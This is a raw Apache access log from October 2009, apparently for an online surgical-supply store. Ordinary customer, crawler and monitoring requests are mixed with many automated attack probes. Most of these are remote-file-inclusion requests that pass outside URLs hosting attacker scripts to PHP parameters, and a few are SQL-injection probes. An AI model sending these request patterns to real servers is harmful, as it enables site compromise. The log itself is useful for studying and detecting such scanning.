98.237.141.84 - - [17/Oct/2009:01:47:51 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:51 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:51 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:51 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:51 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:51 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:52 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:52 -0400] "GET /images/items/ALLOOSS2_THUMB.JPG HTTP/1.1" 200 2001 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:52 -0400] "GET /images/items/ALLOOSS1_THUMB.JPG HTTP/1.1" 200 30054 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:53 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:53 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:53 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:53 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:53 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:53 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:53 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:53 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:53 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:53 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:53 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:47:55 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
128.125.169.162 - - [17/Oct/2009:01:48:07 -0400] "GET /logs/access_log.Q109053100%20%20/zb41/include/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:01:49:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.82.66 - - [17/Oct/2009:01:50:12 -0400] "GET /logs/error_log.Q109092500/.php?id=' HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
124.0.82.66 - - [17/Oct/2009:01:50:13 -0400] "GET /.php?id=' HTTP/1.1" 404 202 "-" "libwww-perl/5.79"
124.0.82.66 - - [17/Oct/2009:01:50:14 -0400] "GET /logs/.php?id=' HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
98.237.141.84 - - [17/Oct/2009:01:50:28 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76790 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:50:33 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:50:33 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
98.237.141.84 - - [17/Oct/2009:01:50:33 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14"
211.43.202.66 - - [17/Oct/2009:01:50:37 -0400] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
211.43.202.66 - - [17/Oct/2009:01:50:37 -0400] "GET /logs//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
72.30.78.230 - - [17/Oct/2009:01:52:07 -0400] "GET /logs/error_log.Q109032500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
128.125.169.162 - - [17/Oct/2009:01:52:21 -0400] "GET //?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:52:22 -0400] "GET /logs/error_log.Q109100300%20%20//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:52:22 -0400] "GET /logs//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:52:31 -0400] "GET /logs/error_log.Q109071300%20%20//?path%5Bdocroot%5D=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:53:01 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:53:07 -0400] "GET /logs/error_log.Q109072700//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:53:40 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:01:53:40 -0400] "GET /logs/error_log.Q109072700//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:01:54:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.239.157.203 - - [17/Oct/2009:01:54:42 -0400] "GET /logs/zboard/include/write.php?dir=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.239.157.203 - - [17/Oct/2009:01:54:42 -0400] "GET /zboard/include/write.php?dir=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.239.157.203 - - [17/Oct/2009:01:54:42 -0400] "GET /logs/access_log.Q109051300/zboard/include/write.php?dir=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:06 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:06 -0400] "GET /logs/access_log.Q109052200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:06 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:08 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:08 -0400] "GET /logs/access_log.Q109052200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:08 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:34 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:35 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:38 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:39 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:39 -0400] "GET /logs/access_log.Q109062900%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:43 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:47 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:55:47 -0400] "GET /logs/access_log.Q109062900%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
199.238.165.123 - - [17/Oct/2009:01:55:59 -0400] "GET /logs/errors.php?error=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
199.238.165.123 - - [17/Oct/2009:01:55:59 -0400] "GET /logs/access_log.Q109052200/errors.php?error=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.238.165.123 - - [17/Oct/2009:01:55:59 -0400] "GET /errors.php?error=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
199.238.165.123 - - [17/Oct/2009:01:56:35 -0400] "GET /errors.php?error=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
199.238.165.123 - - [17/Oct/2009:01:56:38 -0400] "GET /logs/access_log.Q109062900%20%20/errors.php?error=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
199.238.165.123 - - [17/Oct/2009:01:56:38 -0400] "GET /logs/errors.php?error=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
199.238.165.123 - - [17/Oct/2009:01:56:49 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:01:59:30 -0400] "GET /logs/access_log.Q109070500%20%20/errors.php?error=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:01:59:30 -0400] "GET /logs/access_log.Q109080900%20%20/errors.php?error=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:01:59:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.230 - - [17/Oct/2009:02:00:33 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.230 - - [17/Oct/2009:02:00:34 -0400] "GET /logs/access_log.Q109071700 HTTP/1.1" 200 3577551 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.43.202.66 - - [17/Oct/2009:02:00:58 -0400] "GET //index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
211.43.202.66 - - [17/Oct/2009:02:00:58 -0400] "GET /logs//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://wubkk.wu.ac.th/image/icon/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
72.11.145.8 - - [17/Oct/2009:02:01:04 -0400] "GET /logs/access_log.Q109070500%20%20/errors.php?error=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:02:01:04 -0400] "GET /logs/access_log.Q109080900%20%20/errors.php?error=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.82.66 - - [17/Oct/2009:02:01:11 -0400] "GET /logs/access_log.Q109092500/.php?id=' HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
70.85.145.234 - - [17/Oct/2009:02:01:26 -0400] "GET /logs/access_log.Q109072200%20%20//skin/happycast_category_lightblack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
70.85.145.234 - - [17/Oct/2009:02:01:26 -0400] "GET /logs/access_log.Q109080800%20%20//skin/happycast_category_lightblack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:01:26 -0400] "GET ////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:01:26 -0400] "GET /logs/access_log.Q109081600%20%20////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:01:26 -0400] "GET /logs////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:01:27 -0400] "GET /logs/access_log.Q109072400%20%20////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:01:27 -0400] "GET ////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:01:27 -0400] "GET /logs////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:01:27 -0400] "GET /logs/access_log.Q109072400%20%20////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:01:27 -0400] "GET /logs/access_log.Q109081600%20%20////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
173.2.127.111 - - [17/Oct/2009:02:01:39 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://us.mg2.mail.yahoo.com/dc/blank.html?bn=182.10&.intl=us&.lang=en-US" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
64.27.9.117 - - [17/Oct/2009:02:02:01 -0400] "GET ////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:02:01 -0400] "GET /logs/access_log.Q109081600////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:02:01 -0400] "GET ////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:02:01 -0400] "GET /logs/access_log.Q109072400////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:02:01 -0400] "GET /logs/access_log.Q109072400////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:02:01 -0400] "GET /logs////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:02:01 -0400] "GET /logs////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:02:02:04 -0400] "GET /logs/access_log.Q109081600////error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.71.152 - - [17/Oct/2009:02:02:04 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L013063404FC99300AFA905H+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [17/Oct/2009:02:04:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
68.195.51.127 - - [17/Oct/2009:02:05:23 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://co103w.col103.mail.live.com/mail/InboxLight.aspx?n=1912373243" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.85.145.234 - - [17/Oct/2009:02:05:43 -0400] "GET /logs/access_log.Q109072200%20%20//skin/happycast_category_lightblack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
68.127.103.84 - - [17/Oct/2009:02:06:05 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
77.242.37.212 - - [17/Oct/2009:02:06:22 -0400] "GET //skin/zero_vote/error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:02:06:29 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:02:06:29 -0400] "GET /logs/access_log.Q109051100%20%20//skin/zero_vote/error.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.61.82.115 - - [17/Oct/2009:02:06:46 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; nl-nl) AppleWebKit/530.19.2 (KHTML, like Gecko)"
77.242.37.212 - - [17/Oct/2009:02:07:19 -0400] "GET /logs/access_log.Q109051100%20%20//skin/zero_vote/ask_password.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
70.85.145.234 - - [17/Oct/2009:02:07:23 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.fpappalardo.com/baner.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:02:07:26 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:02:07:26 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
70.85.145.234 - - [17/Oct/2009:02:08:46 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.fpappalardo.com/baner.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
70.85.145.234 - - [17/Oct/2009:02:08:53 -0400] "GET /logs/access_log.Q109080800%20%20//skin/happycast_category_lightblack/setup.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.71.152 - - [17/Oct/2009:02:09:08 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0130634040294300A1B905H+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [17/Oct/2009:02:09:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
95.108.150.235 - - [17/Oct/2009:02:11:28 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Yandex/1.01.001 (compatible; Win16; H)"
95.108.150.235 - - [17/Oct/2009:02:11:29 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Yandex/1.01.001 (compatible; Win16; H)"
